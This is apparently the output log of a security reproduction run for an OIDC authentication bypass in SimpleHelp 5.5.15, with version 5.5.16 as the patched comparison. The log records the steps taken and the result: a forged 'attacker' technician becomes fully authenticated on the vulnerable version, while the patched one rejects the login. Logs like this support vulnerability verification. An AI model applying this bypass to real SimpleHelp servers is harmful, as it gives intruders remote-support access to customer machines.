[*] SimpleHelp 5.5.15 already present and SHA256 verified [*] SimpleHelp 5.5.16 already present and SHA256 verified [*] Extracting vulnerable 5.5.15 [*] Extracting patched 5.5.16 [*] Initialising first-launch config for vuln [*] Initialising first-launch config for patched { "login_options_status": 200, "login_options_body": "[{\"type\":\"oidc\",\"name\":\"Test OIDC\"}]", "oidc_get_status": 200, "oidc_get_body": "\"http://127.0.0.1:8080/auth?response_type\\u003dcode\\u0026client_id\\u003dtest-client-id\\u0026redirect_uri\\u003dhttps%3A%2F%2Fip-217-103-2-184.ip.prioritytelecom.net%2Foidc\\u0026scope\\u003dopenid%20profile%20email\\u0026state\\u003da19f2f78-e7d8-4a83-ad91-7d9a53d046a9\"", "auth_url": "http://127.0.0.1:8080/auth?response_type=code&client_id=test-client-id&redirect_uri=https%3A%2F%2Fip-217-103-2-184.ip.prioritytelecom.net%2Foidc&scope=openid%20profile%20email&state=a19f2f78-e7d8-4a83-ad91-7d9a53d046a9", "idp_redirect_location": "https://ip-217-103-2-184.ip.prioritytelecom.net/oidc?code=fakecode&state=a19f2f78-e7d8-4a83-ad91-7d9a53d046a9", "callback_url": "https://127.0.0.1/oidc?code=fakecode&state=a19f2f78-e7d8-4a83-ad91-7d9a53d046a9", "callback_status": 200, "callback_contains_login_complete": false, "callback_contains_login_failed": false, "callback_title_excerpt": "

SimpleHelp

Support Server

Technician Console

Install the Technician Console to connect to customers and to manage your server.
SimpleHelp - Login Success

SimpleHelp

Support Server

Login Failed
\"OpenID

Your login has failed or has timed out. Please try again.

Remote support software by SimpleHelp.
", "cookies": [ "shelp-tc-sessionid=Mr8prxueYevYMnTpBKcp/ydzajwe3Dq56u2rWNxc8EI=" ], "status_after_status": 200, "status_after_body": "{\"state\":\"UNAUTHENTICATED\",\"code\":0}" } [*] Flow summary: { "vulnerable_login_options_has_oidc": true, "vulnerable_auth_url_has_state": true, "vulnerable_idp_token_posted": true, "vulnerable_callback_reached_oidc_authenticator": true, "vulnerable_registered_forged_technician": true, "vulnerable_session_token_registered": true, "vulnerable_status_fully_authenticated": true, "vulnerable_has_no_IDTokenVerifier_class": true, "patched_has_IDTokenVerifier_class": true, "patched_failed_closed": true, "vulnerable_status_after": "{\"state\":\"FULLY_AUTHENTICATED\",\"user\":{\"uniqueID\":480346,\"displayName\":\"Forged Attacker\",\"username\":\"attacker\",\"emailAddress\":\"attacker@example.com\",\"isOnline\":true},\"code\":1}", "patched_status_after": "{\"state\":\"UNAUTHENTICATED\",\"code\":0}" } [+] Reproduction runtime proof completed. Logs are in /data/pruva/runs/4c3fb457-d972-4b2b-8f84-f813688622c8/bundle/logs